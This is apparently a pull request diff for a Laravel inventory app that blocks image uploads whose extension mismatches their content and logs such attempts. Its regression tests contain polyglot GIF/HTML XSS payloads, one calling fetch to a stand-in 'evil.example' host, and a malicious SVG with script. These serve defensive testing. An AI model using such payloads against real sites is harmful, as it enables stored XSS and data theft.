### PR TITLE
fix(security): block uploads when file extension mismatches content (…

### DIFF
--- a/app/Http/Controllers/Product/ProductSaveController.php
+++ b/app/Http/Controllers/Product/ProductSaveController.php
@@ -28,7 +28,7 @@ class ProductSaveController extends MainController
             $photoFile = $request->file('photo');
             // Generate a new random file name
             $uuid = Uuid::uuid4();
-            $newFileName = $uuid->toString().'.'.$photoFile->getClientOriginalExtension();
+            $newFileName = $uuid->toString().'.'.$photoFile->extension();
             // Create a path for product photo
             $destinationPath = public_path("asset/upload/product/$product->id");
             try {

--- a/app/Http/Requests/ProductRequest.php
+++ b/app/Http/Requests/ProductRequest.php
@@ -4,6 +4,7 @@ declare(strict_types=1);
 
 namespace App\Http\Requests;
 
+use App\Rules\ExtensionMatchesContent;
 use Illuminate\Foundation\Http\FormRequest;
 use Illuminate\Support\Facades\Auth;
 
@@ -34,7 +35,7 @@ class ProductRequest extends FormRequest
             'quantity' => 'required|numeric|min:0',
             'sku' => 'nullable',
             'min_stock_quantity' => 'required|numeric|min:0',
-            'photo' => 'nullable|image|mimes:jpeg,png,jpg,gif|max:3072', // 3 MB max
+            'photo' => ['nullable', 'image', 'mimes:jpeg,png,jpg,gif', 'max:3072', new ExtensionMatchesContent],
             'barcode' => 'nullable|numeric|digits_between:1,48',
             'elaboration_date' => ['nullable', 'date', 'before_or_equal:today'],
             'expiration_date' => ['nullable', 'date_format:Y-m-d', 'after_or_equal:today'],

--- a/app/Http/Requests/ProfileSaveRequest.php
+++ b/app/Http/Requests/ProfileSaveRequest.php
@@ -4,6 +4,7 @@ declare(strict_types=1);
 
 namespace App\Http\Requests;
 
+use App\Rules\ExtensionMatchesContent;
 use Illuminate\Foundation\Http\FormRequest;
 use Illuminate\Support\Facades\Auth;
 use Illuminate\Validation\Rule;
@@ -25,7 +26,7 @@ class ProfileSaveRequest extends FormRequest
             'timezone' => ['nullable', 'string', 'timezone'],
             'phone' => ['nullable', 'string', 'max:15'],
             'signature_html' => ['nullable', 'string'],
-            'photo' => ['nullable', 'image', 'max:3072'],
+            'photo' => ['nullable', 'image', 'max:3072', new ExtensionMatchesContent],
             'lang' => ['nullable', 'string', 'max:10'],
         ];
     }

--- a/app/Rules/ExtensionMatchesContent.php
+++ b/app/Rules/ExtensionMatchesContent.php
@@ -1,0 +1,46 @@
+<?php
+
+declare(strict_types=1);
+
+namespace App\Rules;
+
+use App\Services\SecurityLogger;
+use Closure;
+use Illuminate\Contracts\Validation\ValidationRule;
+use Illuminate\Http\UploadedFile;
+
+class ExtensionMatchesContent implements ValidationRule
+{
+    public function validate(string $attribute, mixed $value, Closure $fail): void
+    {
+        if (! $value instanceof UploadedFile || ! $value->isValid()) {
+            return;
+        }
+
+        $clientExtension = $this->normalize($value->getClientOriginalExtension());
+        $contentExtension = $this->normalize($value->guessExtension());
+
+        if ($clientExtension === '' || $clientExtension !== $contentExtension) {
+            app(SecurityLogger::class)->log('upload_extension_mismatch', [
+                'attribute' => $attribute,
+                'original_name' => $value->getClientOriginalName(),
+                'client_extension' => $clientExtension,
+                'content_extension' => $contentExtension,
+                'mime' => $value->getMimeType(),
+                'size' => $value->getSize(),
+            ]);
+
+            $fail('The :attribute file name extension must match its actual content.');
+        }
+    }
+
+    private function normalize(string $extension): string
+    {
+        $extension = strtolower($extension);
+
+        return match ($extension) {
+            'jpeg' => 'jpg',
+            default => $extension,
+        };
+    }
+}

--- a/app/Services/SecurityLogger.php
+++ b/app/Services/SecurityLogger.php
@@ -1,0 +1,28 @@
+<?php
+
+declare(strict_types=1);
+
+namespace App\Services;
+
+use Illuminate\Support\Facades\Auth;
+use Illuminate\Support\Facades\Log;
+
+class SecurityLogger
+{
+    /**
+     * @param  array<string, mixed>  $context
+     */
+    public function log(string $event, array $context = []): void
+    {
+        Log::channel('security')->warning('security incident', array_merge([
+            'event' => $event,
+            'channel' => 'security',
+            'ip' => request()->ip(),
+            'user_agent' => request()->userAgent(),
+            'user_id' => Auth::id(),
+            'user_email' => Auth::user()?->email,
+            'method' => request()->method(),
+            'url' => request()->fullUrl(),
+        ], $context));
+    }
+}

--- a/composer.lock
+++ b/composer.lock
@@ -130,16 +130,16 @@
         },
         {
             "name": "aws/aws-sdk-php",
-            "version": "3.391.1",
+            "version": "3.392.3",
             "source": {
                 "type": "git",
                 "url": "https://github.com/aws/aws-sdk-php.git",
-                "reference": "90920ce5518aa864e04da0224bb0ba0ee9e31d7f"
+                "reference": "0ca19a44856b2497ae426f800d35ad97ee179d1a"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/aws/aws-sdk-php/zipball/90920ce5518aa864e04da0224bb0ba0ee9e31d7f",
-                "reference": "90920ce5518aa864e04da0224bb0ba0ee9e31d7f",
+                "url": "https://api.github.com/repos/aws/aws-sdk-php/zipball/0ca19a44856b2497ae426f800d35ad97ee179d1a",
+                "reference": "0ca19a44856b2497ae426f800d35ad97ee179d1a",
                 "shasum": ""
             },
             "require": {
@@ -221,9 +221,9 @@
             "support": {
                 "forum": "https://github.com/aws/aws-sdk-php/discussions",
                 "issues": "https://github.com/aws/aws-sdk-php/issues",
-                "source": "https://github.com/aws/aws-sdk-php/tree/3.391.1"
+                "source": "https://github.com/aws/aws-sdk-php/tree/3.392.3"
             },
-            "time": "2026-08-07T20:18:18+00:00"
+            "time": "2026-08-14T18:11:43+00:00"
         },
         {
             "name": "barryvdh/laravel-dompdf",
@@ -2352,20 +2352,20 @@
         },
         {
             "name": "laravel/framework",
-            "version": "v13.24.0",
+            "version": "v13.25.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/laravel/framework.git",
-                "reference": "6d481710375d2aa67656922ef760cdd2b18bcfe0"
+                "reference": "ed36fe882bd4eed4e6ff75343cbad8dbda03fdba"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/laravel/framework/zipball/6d481710375d2aa67656922ef760cdd2b18bcfe0",
-                "reference": "6d481710375d2aa67656922ef760cdd2b18bcfe0",
+                "url": "https://api.github.com/repos/laravel/framework/zipball/ed36fe882bd4eed4e6ff75343cbad8dbda03fdba",
+                "reference": "ed36fe882bd4eed4e6ff75343cbad8dbda03fdba",
                 "shasum": ""
             },
             "require": {
-                "brick/math": "^0.14.2 || ^0.15 || ^0.16 || ^0.17 || ^0.18",
+                "brick/math": "^0.14.2 || ^0.15 || ^0.16 || ^0.17 || ^0.18 || ^0.19",
                 "composer-runtime-api": "^2.2",
                 "doctrine/inflector": "^2.0.5",
                 "dragonmantank/cron-expression": "^3.4",
@@ -2575,7 +2575,7 @@
                 "issues": "https://github.com/laravel/framework/issues",
                 "source": "https://github.com/laravel/framework"
             },
-            "time": "2026-08-04T15:54:59+00:00"
+            "time": "2026-08-11T13:56:22+00:00"
         },
         {
             "name": "laravel/helpers",
@@ -3024,16 +3024,16 @@
         },
         {
             "name": "league/commonmark",
-            "version": "2.9.1",
+            "version": "2.10.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/thephpleague/commonmark.git",
-                "reference": "73cb188c785abfa7a7bec73487148202968274c6"
+                "reference": "d2d1aa8b35e072966c89bc0c66cf926e56767dc4"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/thephpleague/commonmark/zipball/73cb188c785abfa7a7bec73487148202968274c6",
-                "reference": "73cb188c785abfa7a7bec73487148202968274c6",
+                "url": "https://api.github.com/repos/thephpleague/commonmark/zipball/d2d1aa8b35e072966c89bc0c66cf926e56767dc4",
+                "reference": "d2d1aa8b35e072966c89bc0c66cf926e56767dc4",
                 "shasum": ""
             },
             "require": {
@@ -3070,7 +3070,7 @@
             "type": "library",
             "extra": {
                 "branch-alias": {
-                    "dev-main": "2.10-dev"
+                    "dev-main": "2.11-dev"
                 }
             },
             "autoload": {
@@ -3127,7 +3127,7 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2026-08-09T14:10:38+00:00"
+            "time": "2026-08-11T16:06:25+00:00"
         },
         {
             "name": "league/config",
@@ -3583,16 +3583,16 @@
         },
         {
             "name": "maatwebsite/excel",
-            "version": "4.x-dev",
+            "version": "4.0.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/SpartnerNL/Laravel-Excel.git",
-                "reference": "8b44fcb96141ca0ab0659aeba0ac953c61a907fa"
+                "reference": "367e92a78008291684b791b3712d46e6fca77343"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/SpartnerNL/Laravel-Excel/zipball/8b44fcb96141ca0ab0659aeba0ac953c61a907fa",
-                "reference": "8b44fcb96141ca0ab0659aeba0ac953c61a907fa",
+                "url": "https://api.github.com/repos/SpartnerNL/Laravel-Excel/zipball/367e92a78008291684b791b3712d46e6fca77343",
+                "reference": "367e92a78008291684b791b3712d46e6fca77343",
                 "shasum": ""
             },
             "require": {
@@ -3656,7 +3656,7 @@
             ],
             "support": {
                 "issues": "https://github.com/SpartnerNL/Laravel-Excel/issues",
-                "source": "https://github.com/SpartnerNL/Laravel-Excel/tree/4.x"
+                "source": "https://github.com/SpartnerNL/Laravel-Excel/tree/4.0.0"
             },
             "funding": [
                 {
@@ -3668,7 +3668,7 @@
                     "type": "github"
                 }
             ],
-            "time": "2026-08-06T07:18:22+00:00"
+            "time": "2026-08-13T10:52:49+00:00"
         },
         {
             "name": "maennchen/zipstream-php",
@@ -7021,16 +7021,16 @@
         },
         {
             "name": "swagger-api/swagger-ui",
-            "version": "v5.32.12",
+            "version": "v5.32.13",
             "source": {
                 "type": "git",
                 "url": "https://github.com/swagger-api/swagger-ui.git",
-                "reference": "9b5acf38723108ac816dcb7303897e87f933ac4e"
+                "reference": "2a33d7805eb5fff693952cebb9203ee113ab4663"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/swagger-api/swagger-ui/zipball/9b5acf38723108ac816dcb7303897e87f933ac4e",
-                "reference": "9b5acf38723108ac816dcb7303897e87f933ac4e",
+                "url": "https://api.github.com/repos/swagger-api/swagger-ui/zipball/2a33d7805eb5fff693952cebb9203ee113ab4663",
+                "reference": "2a33d7805eb5fff693952cebb9203ee113ab4663",
                 "shasum": ""
             },
             "type": "library",
@@ -7076,9 +7076,9 @@
             ],
             "support": {
                 "issues": "https://github.com/swagger-api/swagger-ui/issues",
-                "source": "https://github.com/swagger-api/swagger-ui/tree/v5.32.12"
+                "source": "https://github.com/swagger-api/swagger-ui/tree/v5.32.13"
             },
-            "time": "2026-08-03T08:38:55+00:00"
+            "time": "2026-08-11T12:38:19+00:00"
         },
         {
             "name": "symfony/clock",
@@ -10447,16 +10447,16 @@
         },
         {
             "name": "zircote/swagger-php",
-            "version": "6.5.2",
+            "version": "6.5.3",
             "source": {
                 "type": "git",
                 "url": "https://github.com/zircote/swagger-php.git",
-                "reference": "cec9ec9157513ba27f15513d4983acbe03ce10b8"
+                "reference": "d0a5edd84dd5e116643c79e53d46814c5a5e4c04"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/zircote/swagger-php/zipball/cec9ec9157513ba27f15513d4983acbe03ce10b8",
-                "reference": "cec9ec9157513ba27f15513d4983acbe03ce10b8",
+                "url": "https://api.github.com/repos/zircote/swagger-php/zipball/d0a5edd84dd5e116643c79e53d46814c5a5e4c04",
+                "reference": "d0a5edd84dd5e116643c79e53d46814c5a5e4c04",
                 "shasum": ""
             },
             "require": {
@@ -10524,7 +10524,7 @@
             ],
             "support": {
                 "issues": "https://github.com/zircote/swagger-php/issues",
-                "source": "https://github.com/zircote/swagger-php/tree/6.5.2"
+                "source": "https://github.com/zircote/swagger-php/tree/6.5.3"
             },
             "funding": [
                 {
@@ -10532,7 +10532,7 @@
                     "type": "github"
                 }
             ],
-            "time": "2026-08-05T02:31:32+00:00"
+            "time": "2026-08-12T04:26:57+00:00"
         }
     ],
     "packages-dev": [
@@ -11184,19 +11184,21 @@
         },
         {
             "name": "hamcrest/hamcrest-php",
-            "version": "v2.1.1",
+            "version": "v3.0.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/hamcrest/hamcrest-php.git",
-                "reference": "f8b1c0173b22fa6ec77a81fe63e5b01eba7e6487"
+                "reference": "b61cd040da1a4925bc90a51c074f5297e7c0fa52"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/hamcrest/hamcrest-php/zipball/f8b1c0173b22fa6ec77a81fe63e5b01eba7e6487",
-                "reference": "f8b1c0173b22fa6ec77a81fe63e5b01eba7e6487",
+                "url": "https://api.github.com/repos/hamcrest/hamcrest-php/zipball/b61cd040da1a4925bc90a51c074f5297e7c0fa52",
+                "reference": "b61cd040da1a4925bc90a51c074f5297e7c0fa52",
                 "shasum": ""
             },
             "require": {
+                "ext-ctype": "*",
+                "ext-dom": "*",
                 "php": "^7.4|^8.0"
             },
             "replace": {
@@ -11205,13 +11207,15 @@
                 "kodova/hamcrest-php": "*"
             },
             "require-dev": {
+                "phpstan/phpstan": "^2.1",
+                "phpstan/phpstan-phpunit": "^2.0",
                 "phpunit/php-file-iterator": "^1.4 || ^2.0 || ^3.0",
                 "phpunit/phpunit": "^4.8.36 || ^5.7 || ^6.5 || ^7.0 || ^8.0 || ^9.0"
             },
             "type": "library",
             "extra": {
                 "branch-alias": {
-                    "dev-master": "2.1-dev"
+                    "dev-master": "3.0-dev"
                 }
             },
             "autoload": {
@@ -11229,9 +11233,9 @@
             ],
             "support": {
                 "issues": "https://github.com/hamcrest/hamcrest-php/issues",
-                "source": "https://github.com/hamcrest/hamcrest-php/tree/v2.1.1"
+                "source": "https://github.com/hamcrest/hamcrest-php/tree/v3.0.0"
             },
-            "time": "2025-04-30T06:54:44+00:00"
+            "time": "2026-03-17T11:56:53+00:00"
         },
         {
             "name": "iamcal/sql-parser",
@@ -11564,16 +11568,16 @@
         },
         {
             "name": "laravel/mcp",
-            "version": "v0.9.2",
+            "version": "v0.9.3",
             "source": {
                 "type": "git",
                 "url": "https://github.com/laravel/mcp.git",
-                "reference": "2bb70c3662dfc2e2ff55c38a10ddf55bed2443b3"
+                "reference": "534b29f18418673033ec918c5a840b6ce9c08327"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/laravel/mcp/zipball/2bb70c3662dfc2e2ff55c38a10ddf55bed2443b3",
-                "reference": "2bb70c3662dfc2e2ff55c38a10ddf55bed2443b3",
+                "url": "https://api.github.com/repos/laravel/mcp/zipball/534b29f18418673033ec918c5a840b6ce9c08327",
+                "reference": "534b29f18418673033ec918c5a840b6ce9c08327",
                 "shasum": ""
             },
             "require": {
@@ -11634,20 +11638,20 @@
                 "issues": "https://github.com/laravel/mcp/issues",
                 "source": "https://github.com/laravel/mcp"
             },
-            "time": "2026-08-06T15:59:47+00:00"
+            "time": "2026-08-10T18:01:31+00:00"
         },
         {
             "name": "laravel/pint",
-            "version": "v1.30.4",
+            "version": "v1.30.5",
             "source": {
                 "type": "git",
                 "url": "https://github.com/laravel/pint.git",
-                "reference": "a96cb6eee2961905d2fce7207aefb80945bf6b28"
+                "reference": "fe4148c503a0e266353d61396b79bbf7f35122df"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/laravel/pint/zipball/a96cb6eee2961905d2fce7207aefb80945bf6b28",
-                "reference": "a96cb6eee2961905d2fce7207aefb80945bf6b28",
+                "url": "https://api.github.com/repos/laravel/pint/zipball/fe4148c503a0e266353d61396b79bbf7f35122df",
+                "reference": "fe4148c503a0e266353d61396b79bbf7f35122df",
                 "shasum": ""
             },
             "require": {
@@ -11655,19 +11659,19 @@
                 "ext-mbstring": "*",
                 "ext-tokenizer": "*",
                 "ext-xml": "*",
-                "php": "^8.2.0"
+                "php": "^8.3.0"
             },
             "require-dev": {
                 "composer/semver": "^3.4.4",
                 "friendsofphp/php-cs-fixer": "^3.95.18",
-                "illuminate/view": "^12.65.0",
+                "illuminate/view": "^13.24.0",
                 "larastan/larastan": "^3.10.0",
-                "laravel-zero/framework": "^12.1.0",
+                "laravel-zero/framework": "^13.0.0",
                 "laravel/agent-detector": "^2.0.2",
                 "laravel/prompts": "^0.3.22",
                 "mockery/mockery": "^1.6.12",
                 "nunomaduro/termwind": "^2.4.0",
-                "pestphp/pest": "^3.8.7"
+                "pestphp/pest": "^4.7.8"
             },
             "bin": [
                 "builds/pint"
@@ -11704,7 +11708,7 @@
                 "issues": "https://github.com/laravel/pint/issues",
                 "source": "https://github.com/laravel/pint"
             },
-            "time": "2026-08-05T16:47:22+00:00"
+            "time": "2026-08-10T15:35:50+00:00"
         },
         {
             "name": "laravel/roster",
@@ -11848,29 +11852,28 @@
         },
         {
             "name": "mockery/mockery",
-            "version": "1.6.12",
+            "version": "1.6.13",
             "source": {
                 "type": "git",
                 "url": "https://github.com/mockery/mockery.git",
-                "reference": "1f4efdd7d3beafe9807b08156dfcb176d18f1699"
+                "reference": "9cb54414cdcd2ec5ca292e7ba19dba3a3444885d"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/mockery/mockery/zipball/1f4efdd7d3beafe9807b08156dfcb176d18f1699",
-                "reference": "1f4efdd7d3beafe9807b08156dfcb176d18f1699",
+                "url": "https://api.github.com/repos/mockery/mockery/zipball/9cb54414cdcd2ec5ca292e7ba19dba3a3444885d",
+                "reference": "9cb54414cdcd2ec5ca292e7ba19dba3a3444885d",
                 "shasum": ""
             },
             "require": {
-                "hamcrest/hamcrest-php": "^2.0.1",
-                "lib-pcre": ">=7.0",
+                "hamcrest/hamcrest-php": "^2.0 || ^3.0",
                 "php": ">=7.3"
             },
             "conflict": {
                 "phpunit/phpunit": "<8.0"
             },
             "require-dev": {
-                "phpunit/phpunit": "^8.5 || ^9.6.17",
-                "symplify/easy-coding-standard": "^12.1.14"
+                "phpunit/phpunit": "^9.6.36",
+                "symplify/easy-coding-standard": "^13.2.17"
             },
             "type": "library",
             "autoload": {
@@ -11927,24 +11930,24 @@
                 "security": "https://github.com/mockery/mockery/security/advisories",
                 "source": "https://github.com/mockery/mockery"
             },
-            "time": "2024-05-16T03:13:13+00:00"
+            "time": "2026-08-15T03:07:32+00:00"
         },
         {
             "name": "myclabs/deep-copy",
-            "version": "1.13.4",
+            "version": "1.14.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/myclabs/DeepCopy.git",
-                "reference": "07d290f0c47959fd5eed98c95ee5602db07e0b6a"
+                "reference": "8680aa248f8e07bc8fb43f56f0f5fc77a0c96aae"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/myclabs/DeepCopy/zipball/07d290f0c47959fd5eed98c95ee5602db07e0b6a",
-                "reference": "07d290f0c47959fd5eed98c95ee5602db07e0b6a",
+                "url": "https://api.github.com/repos/myclabs/DeepCopy/zipball/8680aa248f8e07bc8fb43f56f0f5fc77a0c96aae",
+                "reference": "8680aa248f8e07bc8fb43f56f0f5fc77a0c96aae",
                 "shasum": ""
             },
             "require": {
-                "php": "^7.1 || ^8.0"
+                "php": "^8.0"
             },
             "conflict": {
                 "doctrine/collections": "<1.6.8",
@@ -11979,15 +11982,15 @@
             ],
             "support": {
                 "issues": "https://github.com/myclabs/DeepCopy/issues",
-                "source": "https://github.com/myclabs/DeepCopy/tree/1.13.4"
+                "source": "https://github.com/myclabs/DeepCopy/tree/1.14.0"
             },
             "funding": [
                 {
-                    "url": "https://tidelift.com/funding/github/packagist/myclabs/deep-copy",
-                    "type": "tidelift"
+                    "url": "https://github.com/mnapoli",
+                    "type": "github"
                 }
             ],
-            "time": "2025-08-01T08:46:24+00:00"
+            "time": "2026-08-11T10:17:44+00:00"
         },
         {
             "name": "nunomaduro/collision",
@@ -13398,16 +13401,16 @@
         },
         {
             "name": "rector/rector",
-            "version": "2.6.1",
+            "version": "2.6.2",
             "source": {
                 "type": "git",
                 "url": "https://github.com/rectorphp/rector.git",
-                "reference": "b8e68f058bca43e01a2e1caa51ef022d6551ed95"
+                "reference": "03cd615cdd5648abb5f10ff3a684fdb976687190"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/rectorphp/rector/zipball/b8e68f058bca43e01a2e1caa51ef022d6551ed95",
-                "reference": "b8e68f058bca43e01a2e1caa51ef022d6551ed95",
+                "url": "https://api.github.com/repos/rectorphp/rector/zipball/03cd615cdd5648abb5f10ff3a684fdb976687190",
+                "reference": "03cd615cdd5648abb5f10ff3a684fdb976687190",
                 "shasum": ""
             },
             "require": {
@@ -13446,7 +13449,7 @@
             ],
             "support": {
                 "issues": "https://github.com/rectorphp/rector/issues",
-                "source": "https://github.com/rectorphp/rector/tree/2.6.1"
+                "source": "https://github.com/rectorphp/rector/tree/2.6.2"
             },
             "funding": [
                 {
@@ -13454,7 +13457,7 @@
                     "type": "github"
                 }
             ],
-            "time": "2026-08-03T17:30:34+00:00"
+            "time": "2026-08-12T06:23:05+00:00"
         },
         {
             "name": "sebastian/cli-parser",

--- a/config/logging.php
+++ b/config/logging.php
@@ -76,6 +76,15 @@ return [
             'permission' => 0664,
         ],
 
+        'security' => [
+            'driver' => 'daily',
+            'path' => storage_path('logs/security.log'),
+            'level' => 'info',
+            'days' => 90,
+            'replace_placeholders' => true,
+            'permission' => 0664,
+        ],
+
         'slack' => [
             'driver' => 'slack',
             'url' => env('LOG_SLACK_WEBHOOK_URL'),

--- a/resources/views/currency/index.blade.php
+++ b/resources/views/currency/index.blade.php
@@ -13,7 +13,7 @@
                 @csrf
 
                 <div class="table-responsive">
-                    <table class="table table-sm table-hover align-middle">
+                    <table class="table table-sm table-hover table-striped align-middle">
                         <thead>
                             <tr>
                                 <th>{{ __('Code') }}</th>
@@ -34,7 +34,7 @@
                                     <td class="text-nowrap">{{ $currencyCode }}</td>
                                     <td>{{ $currency->name }}</td>
                                     <td class="text-nowrap">{{ $currency->symbol ?: '—' }}</td>
-                                    <td style="min-width: 180px;">
+                                    <td>
                                         <input
                                             type="number"
                                             step="0.000001"

--- a/tests/Feature/Controllers/Company/CompanySaveControllerTest.php
+++ b/tests/Feature/Controllers/Company/CompanySaveControllerTest.php
@@ -16,8 +16,6 @@ class CompanySaveControllerTest extends TestCase
     #[Test]
     public function it_can_save_company(): void
     {
-        Storage::fake('public');
-
         $data = [
             'name' => fake()->word(),
             'currency' => fake()->bothify('???'),

--- a/tests/Feature/Controllers/Profile/ProfileSaveControllerTest.php
+++ b/tests/Feature/Controllers/Profile/ProfileSaveControllerTest.php
@@ -6,6 +6,9 @@ namespace Tests\Feature\Controllers\Profile;
 
 use App\Http\Middleware\MustChangePassword;
 use App\Models\User;
+use Illuminate\Http\UploadedFile;
+use Illuminate\Log\Events\MessageLogged;
+use Illuminate\Support\Facades\Event;
 use PHPUnit\Framework\Attributes\Test;
 use Tests\TestCase;
 
@@ -34,6 +37,31 @@ class ProfileSaveControllerTest extends TestCase
         $response->assertSee($data['first_name']);
         $response->assertSee($data['last_name']);
         $response->assertSee($data['email']);
+    }
+
+    #[Test]
+    public function it_blocks_polyglot_photo_upload_and_logs_security_incident(): void
+    {
+        Event::fake([MessageLogged::class]);
+
+        $payload = "GIF89a\n<html><body><script>alert('xss')</script></body></html>";
+        $file = UploadedFile::fake()->createWithContent('poc.html', $payload)->mimeType('image/gif');
+
+        $response = $this->post('profile/save', [
+            'first_name' => fake()->name(),
+            'last_name' => fake()->name(),
+            'email' => fake()->email(),
+            'lang' => 'en',
+            'photo' => $file,
+        ]);
+
+        $response->assertSessionHasErrors('photo');
+        $this->assertNull($this->user->fresh()->photo);
+
+        Event::assertDispatched(MessageLogged::class, function (MessageLogged $event) {
+            return ($event->context['channel'] ?? null) === 'security'
+                && ($event->context['event'] ?? null) === 'upload_extension_mismatch';
+        });
     }
 
     #[Test]

--- a/tests/Feature/Controllers/Security/IDORDestructiveTest.php
+++ b/tests/Feature/Controllers/Security/IDORDestructiveTest.php
@@ -125,7 +125,7 @@ class IDORDestructiveTest extends TestCase
             'currency' => 'USD',
         ]);
 
-        $response->assertRedirect('/company');
+        $response->assertForbidden();
 
         $companyB->refresh();
         $this->assertEquals($originalName, $companyB->name);

--- a/tests/Feature/Security/ProductPhotoUploadValidationTest.php
+++ b/tests/Feature/Security/ProductPhotoUploadValidationTest.php
@@ -1,0 +1,116 @@
+<?php
+
+declare(strict_types=1);
+
+namespace Tests\Feature\Security;
+
+use App\Models\Product;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Http\UploadedFile;
+use Illuminate\Log\Events\MessageLogged;
+use Illuminate\Support\Carbon;
+use Illuminate\Support\Facades\Event;
+use PHPUnit\Framework\Attributes\Test;
+use Spatie\Permission\Models\Permission;
+use Spatie\Permission\Models\Role;
+use Tests\TestCase;
+
+class ProductPhotoUploadValidationTest extends TestCase
+{
+    use RefreshDatabase;
+
+    private User $seller;
+
+    protected function setUp(): void
+    {
+        parent::setUp();
+
+        $sellerRole = Role::create(['name' => 'Seller', 'guard_name' => 'web']);
+        $sellerRole->givePermissionTo(Permission::findOrCreate('create product', 'web'));
+        $sellerRole->givePermissionTo(Permission::findOrCreate('update product', 'web'));
+
+        $this->seller = User::factory()->create();
+        $this->seller->assignRole($sellerRole);
+    }
+
+    #[Test]
+    public function it_blocks_polyglot_upload_with_mismatched_extension_and_logs_security_incident(): void
+    {
+        Event::fake([MessageLogged::class]);
+
+        $payload = "GIF89a\n<html><body><script>fetch('https://evil.example/steal')</script></body></html>";
+        $file = UploadedFile::fake()->createWithContent('poc.html', $payload)->mimeType('image/gif');
+
+        $this->actingAs($this->seller);
+
+        $product = Product::factory()->make()->toArray();
+        $product['expiration_date'] = Carbon::tomorrow()->format('Y-m-d');
+        $product['photo'] = $file;
+
+        $response = $this->post('/product/save', $product);
+
+        $response->assertSessionHasErrors('photo');
+        $this->assertSame(0, Product::withoutGlobalScopes()->count());
+
+        Event::assertDispatched(MessageLogged::class, function (MessageLogged $event) {
+            return ($event->context['channel'] ?? null) === 'security'
+                && ($event->context['event'] ?? null) === 'upload_extension_mismatch'
+                && ($event->context['client_extension'] ?? null) === 'html'
+                && ($event->context['content_extension'] ?? null) === 'gif'
+                && ($event->context['user_id'] ?? null) === $this->seller->id
+                && ($event->context['user_email'] ?? null) === $this->seller->email
+                && ($event->context['ip'] ?? null) !== null;
+        });
+    }
+
+    #[Test]
+    public function it_accepts_legit_image_when_extension_matches_content(): void
+    {
+        $this->actingAs($this->seller);
+
+        $product = Product::factory()->make()->toArray();
+        $product['expiration_date'] = Carbon::tomorrow()->format('Y-m-d');
+        $product['photo'] = UploadedFile::fake()->image('photo.jpg');
+
+        $this->post('/product/save', $product)->assertRedirect('/product');
+
+        $saved = Product::withoutGlobalScopes()->first();
+        $this->assertNotNull($saved);
+        $this->assertNotNull($saved->photo);
+        $this->assertStringEndsWith('.jpg', $saved->photo);
+
+        $this->cleanupUploadedProductPhoto($saved);
+    }
+
+    #[Test]
+    public function it_accepts_jpeg_extension_matching_jpeg_content(): void
+    {
+        $this->actingAs($this->seller);
+
+        $product = Product::factory()->make()->toArray();
+        $product['expiration_date'] = Carbon::tomorrow()->format('Y-m-d');
+        $product['photo'] = UploadedFile::fake()->image('photo.jpeg');
+
+        $this->post('/product/save', $product)->assertRedirect('/product');
+
+        $saved = Product::withoutGlobalScopes()->first();
+        $this->assertNotNull($saved);
+        $this->assertNotNull($saved->photo);
+        $this->assertStringEndsWith('.jpg', $saved->photo);
+
+        $this->cleanupUploadedProductPhoto($saved);
+    }
+
+    private function cleanupUploadedProductPhoto(Product $product): void
+    {
+        $directory = public_path("asset/upload/product/{$product->id}");
+
+        if (is_dir($directory)) {
+            foreach (glob($directory.'/*') ?: [] as $file) {
+                @unlink($file);
+            }
+            @rmdir($directory);
+        }
+    }
+}

--- a/tests/Feature/Security/SvgLogoUploadXssTest.php
+++ b/tests/Feature/Security/SvgLogoUploadXssTest.php
@@ -10,18 +10,22 @@ use Illuminate\Foundation\Testing\RefreshDatabase;
 use Illuminate\Http\UploadedFile;
 use Tests\TestCase;
 
+/**
+ * Security regression tests for the company logo upload.
+ *
+ * Documents the fix for CWE-434 (Unrestricted Upload) + CWE-79 (Stored XSS):
+ * SVG files with embedded <script> are rejected before being stored.
+ */
 class SvgLogoUploadXssTest extends TestCase
 {
     use RefreshDatabase;
 
-    public function test_svg_logo_upload_accepted_without_validation(): void
+    public function test_malicious_svg_logo_upload_is_rejected(): void
     {
-        // Create test data
         $company = Company::factory()->create(['name' => 'Test Corp']);
         $user = User::factory()->create(['company_id' => $company->id]);
         $user->assignRole('SuperAdmin');
 
-        // Create malicious SVG content
         $maliciousSvg = <<<'SVG'
 <?xml version="1.0" encoding="UTF-8"?>
 <svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
@@ -34,10 +38,7 @@ SVG;
 
         $file = UploadedFile::fake()->createWithContent('logo.svg', $maliciousSvg);
 
-        // Authenticate as user with "update company" permission
         $this->actingAs($user);
-
-        // Upload logo - no validation should stop this
         $response = $this->post('/company/save', [
             'id' => $company->id,
             'name' => $company->name,
@@ -45,21 +46,12 @@ SVG;
             'logo' => $file,
         ]);
 
-        // Verify upload was accepted (no validation error)
-        $this->assertResponseRedirects('/company');
-
-        // Verify company was updated with logo
-        $updatedCompany = $company->fresh();
-        $this->assertNotNull($updatedCompany->logo);
-        $this->assertStringEndsWith('.svg', $updatedCompany->logo);
-
-        echo "\n✓ SVG file upload accepted without validation\n";
-        echo '  Logo filename stored: '.$updatedCompany->logo."\n";
+        $response->assertSessionHasErrors('logo');
+        $this->assertNull($company->fresh()->logo);
     }
 
-    public function test_company_logo_served_publicly_without_authentication(): void
+    public function test_malicious_svg_is_not_persisted_as_company_logo(): void
     {
-        // Create company and upload logo
         $company = Company::factory()->create(['name' => 'Public Test']);
         $user = User::factory()->create(['company_id' => $company->id]);
         $user->assignRole('SuperAdmin');
